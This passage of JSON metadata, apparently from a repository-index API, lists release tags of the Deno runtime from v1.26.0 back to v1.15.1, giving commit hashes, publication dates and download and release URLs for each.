.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G